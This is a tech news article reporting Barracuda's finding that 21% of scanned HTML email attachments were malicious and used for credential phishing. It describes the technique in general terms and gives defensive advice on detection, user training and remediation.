Barracuda researchers discover malicious HTML attachments being used in emails
Researchers at Barracuda have recently analyzed data on the millions of attachments scanned by Barracuda systems over the past month to identify HTML attachments being used the most for malicious purposes. 21% of all HTML attachments scanned by Barracuda were malicious.
HTML attachments are commonly used in email communication. These are particularly common in system-generated email reports that users might receive regularly. These messages include URL links to the actual report. Attackers have been embedding HTML attachments in emails disguised as a weekly report, tricking users into clicking on phishing links. These are successful techniques because hackers no longer need to include malicious links in an email, allowing them to easily bypass anti-spam and anti-virus policies.
The malicious HTML attachments are being used for credential phishing. They include a link to a phishing site, which, when opened, gets redirected to a third-party machine that requests the users to enter their credentials to access information or download a file that may contain malware. Hackers don’t always need to create a fake website. They can create a phishing form directly embedded in the attachment, ultimately sending phishing sites as attachments instead of links.
“These attacks are difficult to detect because HTML attachments themselves are not malicious. Attackers do not include malware in the attachment but instead use multiple redirects with Javascript libraries hosted elsewhere. Potential protection against these attacks should take into account an entire email with HTML attachments, looking at all redirects and analyzing the content of the email for malicious intent,” said Parag Khurana, Country Manager, Barracuda Networks India.
Considering such HTML attachments are hard to identify accurately, and detection often includes many false positives, the best solutions are machine learning and static code analysis that can evaluate the content of an email to identify and block malicious HTML attachments.
Meanwhile, given the volume of these attacks, users should be wary of all HTML attachments, especially those coming from sources they haven’t seen before. They must be trained with examples of these attacks as part of their phishing simulation campaigns and urged to always double-check before sharing their login credentials.
In case, malicious emails get through, it is necessary to keep the post-delivery remediation tools ready to quickly identify and remove any instances of those emails from all user inboxes. Automated incident response can help do this quickly before attacks spread through an organization, and account takeover protection can monitor and alert the users of suspicious account activity if login credentials were to be compromised.
Adobe unveils Content Supply Chain Solution
At Adobe Summit 2023, Adobe announced Content Supply Chain solution, the most comprehensiv...
Aerospike boosts Community Leadership and Enterprise Support for Spring Framework
Aerospike has released expanded functionality and engineering support for the Spring Frame...
VMware announces Limitless Possibilities for Partners
VMware has announced the next evolution of the company’s flagship VMware Partner Con...
The new wave of start-ups in the country is a testimony to the entrepreneurial temperament of the youth
PHDCCI conducted “Bharat Startup Summit, 2023” The conclave through discussion...
Team Computers hosts an Experiential CXO Meet with Google Cloud in Goa
Team Computers has held an experiential event in collaboration with Google Cloud, bringing...
BPE showcases Energy Storage Solutions at ELECRAMA
Best Power Equipments (BPE) has presented Energy Storage Solutions (ESS) at ELECRAMA. The...
Synersoft Technologies organizes a Webinar on the problems faced by SMEs
Synersoft Technologies has organized a Webinar on “Solution to problems faced by SME...